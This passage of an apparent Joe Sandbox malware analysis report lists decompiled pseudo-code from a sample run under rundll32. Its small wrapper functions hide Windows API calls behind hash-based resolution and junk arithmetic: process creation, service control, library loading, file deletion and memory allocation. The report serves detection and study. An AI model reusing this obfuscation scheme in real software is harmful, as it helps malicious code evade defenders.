				_v16 = _v16 | 0xe2c96d38;
				_v16 = _v16 ^ 0xe2c994d7;
				_v12 = 0xc19e;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x000060ae;
				_v8 = 0x265e;
				_v8 = _v8 + 0x315a;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0x02bd94c0;
				E002B7378(__ecx, 0x8a39c19d, __ecx, 0x90f109b3, 0x96);
				_t43 = lstrcmpiW(_t46, _a4); // executed
				return _t43;
			}

0x002b7f52
0x002b7f55
0x002b7f57
0x002b7f5a
0x002b7f5e
0x002b7f5f
0x002b7f64
0x002b7f6b
0x002b7f72
0x002b7f79
0x002b7f94
0x002b7f97
0x002b7f9e
0x002b7fa5
0x002b7fac
0x002b7fb3
0x002b7fba
0x002b7fbe
0x002b7fc5
0x002b7fcc
0x002b7fd3
0x002b7fd7
0x002b7feb
0x002b7ff7
0x002b7ffd

APIs

lstrcmpiW.KERNELBASE(?,000060AE,?,?,?,?,?,?,?,?,?,00000000), ref: 002B7FF7

Strings

ZHq, xrefs: 002B7F6B

Memory Dump Source

Source File: 0000000A.00000002.2338282736.00000000002B0000.00000040.00020000.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000A.00000002.2338372991.00000000002D0000.00000040.00020000.sdmp Download File
Associated: 0000000A.00000002.2338390519.00000000002D2000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b0000_rundll32.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID: ZHq
API String ID: 1586166983-2177431251
Opcode ID: 1dbb23c816d530a556f00a9c331316415ddf5d0f243181d7c072a17d6123fc67
Instruction ID: f3967262fe914e9bafc781a4cbfa56d5332a032867a70580b7bd03302e3f7256
Opcode Fuzzy Hash: 1dbb23c816d530a556f00a9c331316415ddf5d0f243181d7c072a17d6123fc67
Instruction Fuzzy Hash: 42110FB6C00219ABDF01DFA4C90A8DEBFB8EF04318F108588E92466241D3B95B24DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 001FE620, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 001FE6A4

Strings

VirtualAlloc, xrefs: 001FE689, 001FE68C

Memory Dump Source

Source File: 0000000A.00000002.2338123179.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
Instruction ID: 061bc175958b1e3d891ac607f0d4a7bad2d014892118e11b02f0dbb87003a93f
Opcode Fuzzy Hash: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
Instruction Fuzzy Hash: 1B110D60D0828DEAEF01D7E89409BFEBFB55B21704F044098E6456B282D7BA57588BA6

Uniqueness

Uniqueness Score: -1.00%

Function 002CB86E, Relevance: 1.6, APIs: 1, Instructions: 74
processCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E002CB86E(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, WCHAR* _a24, struct _PROCESS_INFORMATION* _a40, intOrPtr _a44, intOrPtr _a48, WCHAR* _a52, intOrPtr _a56, struct _STARTUPINFOW* _a60, intOrPtr _a68) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t49;
				int _t58;
				signed int _t60;
				int _t65;

				_push(_a68);
				_t65 = __ecx;
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(_a48);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(0);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E002C2550(_t49);
				_v12 = 0xd1fa;
				_t60 = 0x3c;
				_v12 = _v12 / _t60;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 ^ 0x00001682;
				_v20 = 0xd4c2;
				_v20 = _v20 + 0x3986;
				_v20 = _v20 ^ 0x00013905;
				_v8 = 0x8c53;
				_v8 = _v8 >> 4;
				_v8 = _v8 << 1;
				_v8 = _v8 ^ 0x000060d6;
				_v16 = 0x467b;
				_v16 = _v16 + 0xffff2b71;
				_v16 = _v16 ^ 0xffff105c;
				E002B7378(_t60, 0x8aa9db76, _t60, 0x90f109b3, 0x100);
				_t58 = CreateProcessW(_a52, _a24, 0, 0, _t65, 0, 0, 0, _a60, _a40); // executed
				return _t58;
			}

0x002cb876
0x002cb87b
0x002cb87d
0x002cb87e
0x002cb881
0x002cb884
0x002cb887
0x002cb88a
0x002cb88d
0x002cb890
0x002cb891
0x002cb892
0x002cb893
0x002cb896
0x002cb897
0x002cb89a
0x002cb89d
0x002cb8a0
0x002cb8a4
0x002cb8a5
0x002cb8aa
0x002cb8bb
0x002cb8c3
0x002cb8c6
0x002cb8ca
0x002cb8d1
0x002cb8d8
0x002cb8df
0x002cb8e6
0x002cb8ed
0x002cb8f1
0x002cb8f4
0x002cb8fb
0x002cb902
0x002cb909
0x002cb928
0x002cb942
0x002cb949

APIs

CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 002CB942

Memory Dump Source

Source File: 0000000A.00000002.2338282736.00000000002B0000.00000040.00020000.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000A.00000002.2338372991.00000000002D0000.00000040.00020000.sdmp Download File
Associated: 0000000A.00000002.2338390519.00000000002D2000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b0000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 0c2a7e7f22d8817370b5b33d85e2b014bcdf9d8a6a03b3886b5f04f00f255257
Instruction ID: 6982044b802c0e4592d6811af42bf6dae0dd711fb52554f82579df20eac0f50e
Opcode Fuzzy Hash: 0c2a7e7f22d8817370b5b33d85e2b014bcdf9d8a6a03b3886b5f04f00f255257
Instruction Fuzzy Hash: 6721D372800248BBDF169F95CC09CDFBFB9FB89714F408158FA1466260D7B69A60DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 002B471A, Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E002B471A(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t50;
				intOrPtr* _t61;
				void* _t62;
				signed int _t63;
				signed int _t64;

				E002C2550(_t50);
				_v20 = 0xf336;
				_v20 = _v20 + 0x29f7;
				_v20 = _v20 ^ 0x000152a0;
				_v8 = 0xc9c4;
				_v8 = _v8 >> 0x10;
				_v8 = _v8 << 3;
				_t63 = 0x6d;
				_v8 = _v8 * 0x43;
				_v8 = _v8 ^ 0x0000467c;
				_v16 = 0x763b;
				_t64 = 0x2d;
				_v16 = _v16 / _t63;
				_v16 = _v16 << 4;
				_v16 = _v16 ^ 0x000058e5;
				_v12 = 0x527e;
				_v12 = _v12 / _t64;
				_v12 = _v12 | 0xd776a7a3;
				_v12 = _v12 ^ 0xd776f938;
				_t61 = E002B7378(_t64, 0x23d331d1, _t64, 0xd20b8aa4, 0x174);
				_t62 =  *_t61(0, _a4, 0, 0, _a8, 0, 0, _a4, _a8, _a12, _a16, _a20, _a24, _a28, 0); // executed
				return _t62;
			}

0x002b473b
0x002b4740
0x002b474a
0x002b4753
0x002b475a
0x002b4761
0x002b4765
0x002b476f
0x002b4772
0x002b4775
0x002b477c
0x002b4788
0x002b4789
0x002b478e
0x002b4792
0x002b4799
0x002b47aa
0x002b47ad
0x002b47b4
0x002b47d3
0x002b47e4
0x002b47ea

APIs

SHGetFolderPathW.SHELL32(00000000,D776F938,00000000,00000000,000058E5), ref: 002B47E4

Memory Dump Source

Source File: 0000000A.00000002.2338282736.00000000002B0000.00000040.00020000.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000A.00000002.2338372991.00000000002D0000.00000040.00020000.sdmp Download File
Associated: 0000000A.00000002.2338390519.00000000002D2000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b0000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: 0a1e481ed0b4bb684b4a4fbdce82325e9ffb300045724f91d1da592bf306b1e2
Instruction ID: ea603286fc35198e7a280a990f9bc3f9bafc5bcf420f5b48449cac798d4311ea
Opcode Fuzzy Hash: 0a1e481ed0b4bb684b4a4fbdce82325e9ffb300045724f91d1da592bf306b1e2
Instruction Fuzzy Hash: 942100B2D01208FBEF05DFE4C84A8DEBBB5EF45354F108089E924A6250D7B59B20EF90

Uniqueness

Uniqueness Score: -1.00%

Function 002C340E, Relevance: 1.6, APIs: 1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E002C340E(void* __ecx, void* __edx, int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				short* _v24;
				intOrPtr _v28;
				void* _t45;
				void* _t57;
				signed int _t59;
				signed int _t60;

				_push(_a12);
				_push(0);
				_push(0);
				E002C2550(_t45);
				_v28 = 0x755cc3;
				_v24 = 0;
				_v20 = 0xc93f;
				_v20 = _v20 >> 3;
				_t59 = 0x1a;
				_v20 = _v20 / _t59;
				_v20 = _v20 ^ 0x00003660;
				_v16 = 0x16ad;
				_v16 = _v16 + 0x57a7;
				_v16 = _v16 | 0xbe0b763b;
				_v16 = _v16 ^ 0xbe0b2e9f;
				_v12 = 0xa207;
				_v12 = _v12 + 0xb6;
				_t60 = 0x37;
				_v12 = _v12 * 0x38;
				_v12 = _v12 ^ 0x0023dbd3;
				_v8 = 0xebb1;
				_v8 = _v8 / _t60;
				_v8 = _v8 | 0x19ad118e;
				_v8 = _v8 ^ 0x19ad0924;
				E002B7378(_t60, 0x3e7f6fd6, _t60, 0x2daf77dd, 0x231);
				_t57 = OpenSCManagerW(0, 0, _a12); // executed
				return _t57;
			}

0x002c3415
0x002c341a
0x002c341b
0x002c341e
0x002c3423
0x002c342d
0x002c3432
0x002c3439
0x002c3442
0x002c3447
0x002c344c
0x002c3453
0x002c345a
0x002c3461
0x002c3468
0x002c346f
0x002c3476
0x002c3481
0x002c348d
0x002c3490
0x002c3497
0x002c34a8
0x002c34ab
0x002c34b2
0x002c34c6
0x002c34d3
0x002c34d9

APIs

OpenSCManagerW.SECHOST(00000000,00000000,00003660,?,?,?,?,?,?,?,?,?,B0D9BF73), ref: 002C34D3

Memory Dump Source

Source File: 0000000A.00000002.2338282736.00000000002B0000.00000040.00020000.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000A.00000002.2338372991.00000000002D0000.00000040.00020000.sdmp Download File
Associated: 0000000A.00000002.2338390519.00000000002D2000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b0000_rundll32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: c0ae0e58ecd35d2b9c62b79812254f01c588eabc6ff7d27383c4dcafa84254bd
Instruction ID: ff5179d71186e077bb445a85e6fb8139c911ec2366ae10bd0b2873adda6a7bf9
Opcode Fuzzy Hash: c0ae0e58ecd35d2b9c62b79812254f01c588eabc6ff7d27383c4dcafa84254bd
Instruction Fuzzy Hash: AB2113B1D0131DABDB08DFA9C84A8EFBBB4FB00314F10819AE414AA240D3B55B148F90

Uniqueness

Uniqueness Score: -1.00%

Function 002C0321, Relevance: 1.6, APIs: 1, Instructions: 59
serviceCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E002C0321(void* __ecx, int __edx, intOrPtr _a4, intOrPtr _a8, short* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t44;
				void* _t56;
				void* _t59;
				int _t60;

				_push(_a12);
				_t60 = __edx;
				_t59 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002C2550(_t44);
				_v24 = _v24 & 0x00000000;
				_v28 = 0xc39a9;
				_v20 = 0xd5ea;
				_v20 = _v20 | 0xff6e49b2;
				_v20 = _v20 << 1;
				_v20 = _v20 ^ 0xfeddf181;
				_v12 = 0x5ebb;
				_v12 = _v12 * 0x36;
				_v12 = _v12 * 0x4e;
				_v12 = _v12 | 0x0415626f;
				_v12 = _v12 ^ 0x0617d8e0;
				_v16 = 0xb467;
				_v16 = _v16 << 4;
				_v16 = _v16 * 0x58;
				_v16 = _v16 ^ 0x03e03a17;
				_v8 = 0xc80e;
				_v8 = _v8 * 5;
				_v8 = _v8 * 0x5d;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x000b2851;
				E002B7378(__ecx, 0x612723fe, __ecx, 0x2daf77dd, 0x10e);
				_t56 = OpenServiceW(_t59, _a12, _t60); // executed
				return _t56;
			}

0x002c0329
0x002c032c
0x002c032e
0x002c0330
0x002c0333
0x002c0336
0x002c0337
0x002c0338
0x002c033d
0x002c0344
0x002c034b
0x002c0352
0x002c0359
0x002c035c
0x002c0363
0x002c037e
0x002c0386
0x002c0389
0x002c0390
0x002c0397
0x002c039e
0x002c03a6
0x002c03a9
0x002c03b0
0x002c03bb
0x002c03c2
0x002c03c5
0x002c03c9
0x002c03dc
0x002c03e9
0x002c03f0

APIs

OpenServiceW.SECHOST(?,FEDDF181,B0D9BF73,?,?,?,?,?,?,?,?,00000000,B0D9BF73), ref: 002C03E9

Memory Dump Source

Source File: 0000000A.00000002.2338282736.00000000002B0000.00000040.00020000.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000A.00000002.2338372991.00000000002D0000.00000040.00020000.sdmp Download File
Associated: 0000000A.00000002.2338390519.00000000002D2000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b0000_rundll32.jbxd

Yara matches

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: 0746f5dc7b9730f7e3e73603d11b48040c955b65539017cf6c6302df4382ab22
Instruction ID: f27e4154af88423286b57131f1972ef4db09dc1223a559e53925235d39ee4f49
Opcode Fuzzy Hash: 0746f5dc7b9730f7e3e73603d11b48040c955b65539017cf6c6302df4382ab22
Instruction Fuzzy Hash: 7C21FFB1C01209FBCB04DFA5C98A8DEBFB8EB45304F108199E825B6251D7B49B54DF90

Uniqueness

Uniqueness Score: -1.00%

Function 002C49CF, Relevance: 1.6, APIs: 1, Instructions: 58
libraryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E002C49CF(void* __ecx, void* __edx, WCHAR* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t52;
				struct HINSTANCE__* _t65;
				signed int _t67;
				signed int _t68;
				signed int _t69;

				_push(_a4);
				E002C2550(_t52);
				_v24 = _v24 & 0x00000000;
				_v28 = 0x2e62bd;
				_v12 = 0x9175;
				_v12 = _v12 >> 3;
				_v12 = _v12 >> 4;
				_t67 = 0x72;
				_v12 = _v12 / _t67;
				_v12 = _v12 ^ 0x00007d95;
				_v20 = 0x6b8f;
				_v20 = _v20 + 0xab5d;
				_v20 = _v20 ^ 0x000118a2;
				_v16 = 0x74fd;
				_v16 = _v16 + 0xb2f4;
				_v16 = _v16 | 0x45835894;
				_v16 = _v16 ^ 0x45831718;
				_v8 = 0x475a;
				_t68 = 0x1a;
				_v8 = _v8 / _t68;
				_t69 = 0x71;
				_v8 = _v8 / _t69;
				_v8 = _v8 | 0x9a1a6af5;
				_v8 = _v8 ^ 0x9a1a601d;
				E002B7378(_t69, 0xd3779e90, _t69, 0x90f109b3, 0xd8);
				_t65 = LoadLibraryW(_a4); // executed
				return _t65;
			}

0x002c49d5
0x002c49da
0x002c49df
0x002c49e6
0x002c49ef
0x002c49f6
0x002c49fa
0x002c4a03
0x002c4a08
0x002c4a0d
0x002c4a14
0x002c4a1b
0x002c4a22
0x002c4a29
0x002c4a30
0x002c4a37
0x002c4a3e
0x002c4a45
0x002c4a4f
0x002c4a54
0x002c4a5c
0x002c4a64
0x002c4a67
0x002c4a6e
0x002c4a8d
0x002c4a98
0x002c4a9d

APIs

LoadLibraryW.KERNEL32(00007D95), ref: 002C4A98

Memory Dump Source

Source File: 0000000A.00000002.2338282736.00000000002B0000.00000040.00020000.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000A.00000002.2338372991.00000000002D0000.00000040.00020000.sdmp Download File
Associated: 0000000A.00000002.2338390519.00000000002D2000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b0000_rundll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: c29722005f0625fdf4ec6d3b097d6093e6e9b8b9e5bc80068fdeaf8eb8cc74df
Instruction ID: d672b434e89bda8cf00721786515c9b113b4ad09695ca5b9557e63446199abf4
Opcode Fuzzy Hash: c29722005f0625fdf4ec6d3b097d6093e6e9b8b9e5bc80068fdeaf8eb8cc74df
Instruction Fuzzy Hash: 1521F9B5E0020CFBDB08CFE5D94A9EEBBB1EB51304F10C099E518A7291D7B56B549F50

Uniqueness

Uniqueness Score: -1.00%

Function 002C41CA, Relevance: 1.6, APIs: 1, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E002C41CA(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t42;
				intOrPtr* _t50;
				void* _t51;
				signed int _t53;
				void* _t57;

				_t57 = __ecx;
				E002C2550(_t42);
				_v20 = 0x33dd;
				_t53 = 0x60;
				_v20 = _v20 / _t53;
				_v20 = _v20 ^ 0x0000445b;
				_v8 = 0x98b2;
				_v8 = _v8 << 0xa;
				_v8 = _v8 | 0x9f0dae98;
				_v8 = _v8 + 0xffff2dd8;
				_v8 = _v8 ^ 0x9f6f2800;
				_v16 = 0x7a4d;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x630ec107;
				_v16 = _v16 ^ 0x6301fd0c;
				_v12 = 0xd3a1;
				_v12 = _v12 ^ 0x9b5a4994;
				_v12 = _v12 + 0xffffbec0;
				_v12 = _v12 ^ 0x9b5a0da8;
				_t50 = E002B7378(_t53, 0x7c314b7f, _t53, 0x90f109b3, 0x1d9);
				_t51 =  *_t50(_t57, 0, _a12, 0x28, __ecx, __edx, _a4, _a8, _a12, 0, _a20, 0x28); // executed
				return _t51;
			}

0x002c41d6
0x002c41e5
0x002c41ea
0x002c41fb
0x002c4203
0x002c4206
0x002c420d
0x002c4214
0x002c4218
0x002c421f
0x002c4226
0x002c422d
0x002c4234
0x002c4238
0x002c423f
0x002c4246
0x002c424d
0x002c4254
0x002c425b
0x002c427a
0x002c428a
0x002c4290

APIs

SetFileInformationByHandle.KERNELBASE(0026A181,00000000,0000445B,00000028), ref: 002C428A

Memory Dump Source

Source File: 0000000A.00000002.2338282736.00000000002B0000.00000040.00020000.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000A.00000002.2338372991.00000000002D0000.00000040.00020000.sdmp Download File
Associated: 0000000A.00000002.2338390519.00000000002D2000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b0000_rundll32.jbxd

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: c542c3b5640c0f18f6fd6ea0d0e2ab16144babf3d8c5a3537028e32b44421a17
Instruction ID: 847b616c20ece34365b698d39134e872323f5e6f25b60302f2edffb2554a11d9
Opcode Fuzzy Hash: c542c3b5640c0f18f6fd6ea0d0e2ab16144babf3d8c5a3537028e32b44421a17
Instruction Fuzzy Hash: 28114A72E00308BBEB05DFA4CC4AAAEBBB5EF44710F108188E92566291D7B55B249F80

Uniqueness

Uniqueness Score: -1.00%

Function 002B5AB8, Relevance: 1.6, APIs: 1, Instructions: 51
serviceCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E002B5AB8(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t47;
				int _t57;
				signed int _t59;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E002C2550(_t47);
				_v20 = 0xc8c;
				_v20 = _v20 + 0xffffaa04;
				_v20 = _v20 ^ 0xb702763d;
				_v20 = _v20 ^ 0x48fdd1a6;
				_v16 = 0xeb1c;
				_v16 = _v16 << 4;
				_t59 = 0xf;
				_v16 = _v16 * 0xe;
				_v16 = _v16 + 0xffff64c4;
				_v16 = _v16 ^ 0x00cd6bec;
				_v12 = 0x757;
				_v12 = _v12 ^ 0x4183b2e4;
				_v12 = _v12 << 2;
				_v12 = _v12 / _t59;
				_v12 = _v12 ^ 0x0067440e;
				_v8 = 0xa082;
				_v8 = _v8 >> 1;
				_v8 = _v8 >> 8;
				_v8 = _v8 ^ 0xcec43627;
				_v8 = _v8 ^ 0xcec45939;
				E002B7378(_t59, 0x114af6f7, _t59, 0x2daf77dd, 0x11f);
				_t57 = CloseServiceHandle(_a12); // executed
				return _t57;
			}

0x002b5abe
0x002b5ac1
0x002b5ac4
0x002b5ac9
0x002b5ace
0x002b5ad8
0x002b5ae1
0x002b5ae8
0x002b5aef
0x002b5af6
0x002b5b00
0x002b5b0b
0x002b5b0e
0x002b5b15
0x002b5b1c
0x002b5b23
0x002b5b2a
0x002b5b34
0x002b5b37
0x002b5b3e
0x002b5b45
0x002b5b48
0x002b5b4c
0x002b5b53
0x002b5b6c
0x002b5b77
0x002b5b7c

APIs

CloseServiceHandle.SECHOST(48FDD1A6), ref: 002B5B77

Memory Dump Source

Source File: 0000000A.00000002.2338282736.00000000002B0000.00000040.00020000.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000A.00000002.2338372991.00000000002D0000.00000040.00020000.sdmp Download File
Associated: 0000000A.00000002.2338390519.00000000002D2000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b0000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID:
API String ID: 1725840886-0
Opcode ID: f4cf61d19d0f0e03d476cf6393de878d7bbf839847225a23a7b5c25768a7d686
Instruction ID: e50b5cea461345589a251d1eaec715c19429161ba2967a35b92eafd0553fa5dc
Opcode Fuzzy Hash: f4cf61d19d0f0e03d476cf6393de878d7bbf839847225a23a7b5c25768a7d686
Instruction Fuzzy Hash: 3D110371D0020DFFDB08DFA9C94A9EEBBB0FB40304F508599E525A6291D7B99B25DF40

Uniqueness

Uniqueness Score: -1.00%

Function 002BE554, Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E002BE554(void* __ecx, struct _SHFILEOPSTRUCTW* __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t42;
				int _t51;
				signed int _t53;
				struct _SHFILEOPSTRUCTW* _t57;

				_push(_a4);
				_t57 = __edx;
				_push(__edx);
				E002C2550(_t42);
				_v20 = 0xead4;
				_v20 = _v20 + 0xffff9be4;
				_v20 = _v20 ^ 0x000085bc;
				_v16 = 0x46f7;
				_v16 = _v16 << 0xe;
				_v16 = _v16 << 7;
				_t53 = 0x39;
				_v16 = _v16 / _t53;
				_v16 = _v16 ^ 0x03e8aab4;
				_v12 = 0x2beb;
				_v12 = _v12 ^ 0xafae01c3;
				_v12 = _v12 + 0xffff58eb;
				_v12 = _v12 ^ 0xa5118136;
				_v12 = _v12 ^ 0x0abc415f;
				_v8 = 0xa691;
				_v8 = _v8 ^ 0x7591c523;
				_v8 = _v8 << 0xa;
				_v8 = _v8 + 0x20df;
				_v8 = _v8 ^ 0x458ea297;
				E002B7378(_t53, 0x11ef7293, _t53, 0xd20b8aa4, 0x23a);
				_t51 = SHFileOperationW(_t57); // executed
				return _t51;
			}

0x002be55b
0x002be55e
0x002be560
0x002be562
0x002be567
0x002be571
0x002be57a
0x002be581
0x002be588
0x002be58c
0x002be595
0x002be59d
0x002be5a0
0x002be5a7
0x002be5ae
0x002be5b5
0x002be5bc
0x002be5c3
0x002be5ca
0x002be5d1
0x002be5d8
0x002be5dc
0x002be5e3
0x002be602
0x002be60b
0x002be611

APIs

SHFileOperationW.SHELL32(?,?,?,?,?,?,?,?,?), ref: 002BE60B

Memory Dump Source

Source File: 0000000A.00000002.2338282736.00000000002B0000.00000040.00020000.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000A.00000002.2338372991.00000000002D0000.00000040.00020000.sdmp Download File
Associated: 0000000A.00000002.2338390519.00000000002D2000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b0000_rundll32.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: a2bec794df76323023851c9be7ee8809eaedd15e8b0fb47450a564a3f094c509
Instruction ID: 9e5d966c32951f720d96cab40951000fc6f14b316887231741e40f1c05a192b3
Opcode Fuzzy Hash: a2bec794df76323023851c9be7ee8809eaedd15e8b0fb47450a564a3f094c509
Instruction Fuzzy Hash: EB1123B1D01318BBEB18DFA4C84A8DEBBB4FB00718F108698E82576241D7B95B44DF80

Uniqueness

Uniqueness Score: -1.00%

Function 002BEB1E, Relevance: 1.5, APIs: 1, Instructions: 43
fileCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E002BEB1E(void* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t34;
				int _t44;

				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E002C2550(_t34);
				_v8 = 0xd1b2;
				_v8 = _v8 * 0x63;
				_v8 = _v8 << 4;
				_v8 = _v8 * 0x74;
				_v8 = _v8 ^ 0x4bec8e88;
				_v20 = 0x1fc5;
				_v20 = _v20 + 0x9c84;
				_v20 = _v20 ^ 0x0000b099;
				_v16 = 0x542c;
				_v16 = _v16 | 0x3ba7d0a3;
				_v16 = _v16 ^ 0x3ba7e6ce;
				_v12 = 0x8319;
				_v12 = _v12 * 0x45;
				_v12 = _v12 + 0xffff39a4;
				_v12 = _v12 ^ 0x0022b84c;
				E002B7378(__ecx, 0x497c0ce2, __ecx, 0x90f109b3, 0x28d);
				_t44 = DeleteFileW(_a8); // executed
				return _t44;
			}

0x002beb24
0x002beb27
0x002beb2b
0x002beb2c
0x002beb31
0x002beb49
0x002beb4c
0x002beb5b
0x002beb5e
0x002beb65
0x002beb6c
0x002beb73
0x002beb7a
0x002beb81
0x002beb88
0x002beb8f
0x002beb9a
0x002beb9d
0x002beba4
0x002bebb7
0x002bebc2
0x002bebc7

APIs

DeleteFileW.KERNELBASE(3BA7E6CE), ref: 002BEBC2

Memory Dump Source

Source File: 0000000A.00000002.2338282736.00000000002B0000.00000040.00020000.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000A.00000002.2338372991.00000000002D0000.00000040.00020000.sdmp Download File
Associated: 0000000A.00000002.2338390519.00000000002D2000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b0000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 5b5a61d3999058f75d5056704f6b95223429b9c5b7b3188806985cdc6256b9e5
Instruction ID: 729491581a3b82d0ec8d12c3828dee108d191591999e826393f731dd924e9572
Opcode Fuzzy Hash: 5b5a61d3999058f75d5056704f6b95223429b9c5b7b3188806985cdc6256b9e5
Instruction Fuzzy Hash: 3B11E3B1C0020DFBDF04DFE4DA4689EBBB4FB80354F608599E815A62A1D7749B549F90

Uniqueness

Uniqueness Score: -1.00%

Function 002BF1ED, Relevance: 1.3, APIs: 1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E002BF1ED(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t46;
				int _t57;
				signed int _t59;
				signed int _t60;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E002C2550(_t46);
				_v24 = _v24 & 0x00000000;
				_v28 = 0x28beb0;
				_v16 = 0xe97b;
				_v16 = _v16 >> 3;
				_t59 = 0x47;
				_v16 = _v16 / _t59;
				_v16 = _v16 ^ 0x00001a39;
				_v12 = 0x2d01;
				_v12 = _v12 >> 8;
				_t60 = 0x3a;
				_v12 = _v12 / _t60;
				_v12 = _v12 ^ 0x000023d3;
				_v20 = 0xc5d9;
				_v20 = _v20 | 0x3e7a6da8;
				_v20 = _v20 ^ 0x3e7ad9f3;
				_v8 = 0x3ddd;
				_v8 = _v8 >> 7;
				_v8 = _v8 + 0xffffadd9;
				_v8 = _v8 ^ 0xffff8e91;
				E002B7378(_t60, 0x171b6692, _t60, 0x90f109b3, 0x219);
				_t57 = CloseHandle(_a12); // executed
				return _t57;
			}

0x002bf1f3
0x002bf1f6
0x002bf1f9
0x002bf1fe
0x002bf203
0x002bf20a
0x002bf213
